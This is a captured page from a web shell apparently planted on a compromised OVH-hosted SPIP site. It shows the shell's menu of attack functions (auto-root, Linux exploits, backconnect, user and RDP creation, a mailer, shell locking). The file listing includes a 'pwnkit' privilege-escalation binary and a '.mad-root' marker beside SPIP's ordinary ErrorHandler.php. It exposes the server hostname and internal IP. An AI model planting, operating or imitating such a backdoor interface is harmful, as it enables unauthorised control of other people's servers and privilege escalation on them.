Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
grice /
ecrire /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
Admin
[ DIR ]
drwx---r-x
Afficher
[ DIR ]
drwx---r-x
Chiffrer
[ DIR ]
drwx---r-x
Compilateur
[ DIR ]
drwx---r-x
Css
[ DIR ]
drwx---r-x
I18n
[ DIR ]
drwx---r-x
Sql
[ DIR ]
drwx---r-x
Texte
[ DIR ]
drwx---r-x
.mad-root
0
B
-rw-r--r--
ErrorHandler.php
989
B
-rw----r--
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ErrorHandler.php
<?php namespace Spip; /** * Gestion des erreurs PHP * @internal */ final class ErrorHandler { static bool $done = false; public static function setup(?int $error_level = null): void { if (!self::$done) { self::$done = true; error_reporting($error_level); set_error_handler(self::class . '::user_deprecated', E_USER_DEPRECATED); } } /** Loger les `trigger_deprecated()` */ public static function user_deprecated(int $errno, string $errstr, string $errfile, int $errline): bool { if (!(\E_USER_DEPRECATED & $errno)) { return false; } $backtrace = debug_backtrace(); array_shift($backtrace); do { $t = array_shift($backtrace); $fqdn = ($t['class'] ?? '') . ($t['type'] ?? '') . ($t['function'] ?? ''); } while (in_array($fqdn, ['trigger_error', 'trigger_deprecation'])); $errfile = $t['file']; $errline = $t['line']; spip_log(sprintf('%s in %s on line %s', $errstr, $errfile, $errline), 'deprecated.' . _LOG_INFO); return false; } }
Close